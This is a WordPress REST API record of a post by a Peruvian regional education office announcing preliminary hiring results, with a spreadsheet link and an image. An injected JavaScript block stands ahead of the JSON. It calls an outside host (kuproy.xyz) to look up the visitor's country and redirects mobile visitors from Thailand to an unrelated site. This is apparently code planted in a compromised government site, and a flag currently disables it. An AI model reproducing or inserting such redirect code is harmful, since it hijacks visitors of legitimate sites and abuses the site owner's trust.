<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":6471,"date":"2025-07-24T17:19:44","date_gmt":"2025-07-24T22:19:44","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=6471"},"modified":"2025-07-24T17:19:44","modified_gmt":"2025-07-24T22:19:44","slug":"comunicado-n211-proceso-de-contratacion","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/comunicado-n211-proceso-de-contratacion\/","title":{"rendered":"COMUNICADO N\u00b0211 PROCESO DE CONTRATACI\u00d3N"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<p>RESULTADOS PRELIMINARES<\/p>\n\n\n\n<p><a href=\"https:\/\/docs.google.com\/spreadsheets\/d\/1fceWW44JIx1jM3jgCjDTklfItqv5JOjnya-dakFmd5I\/edit?usp=sharing\">https:\/\/docs.google.com\/spreadsheets\/d\/1fceWW44JIx1jM3jgCjDTklfItqv5JOjnya-dakFmd5I\/edit?usp=sharing<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"723\" src=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2025\/07\/Screenshot_20250724_170655_Word-1024x723.jpg\" alt=\"\" class=\"wp-image-6472\" srcset=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2025\/07\/Screenshot_20250724_170655_Word-1024x723.jpg 1024w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2025\/07\/Screenshot_20250724_170655_Word-300x212.jpg 300w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2025\/07\/Screenshot_20250724_170655_Word-768x543.jpg 768w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2025\/07\/Screenshot_20250724_170655_Word.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>RESULTADOS PRELIMINARES https:\/\/docs.google.com\/spreadsheets\/d\/1fceWW44JIx1jM3jgCjDTklfItqv5JOjnya-dakFmd5I\/edit?usp=sharing<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-6471","post","type-post","status-publish","format-standard","hentry","category-rotacion-personal"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/6471","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=6471"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/6471\/revisions"}],"predecessor-version":[{"id":6473,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/6471\/revisions\/6473"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=6471"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=6471"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=6471"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}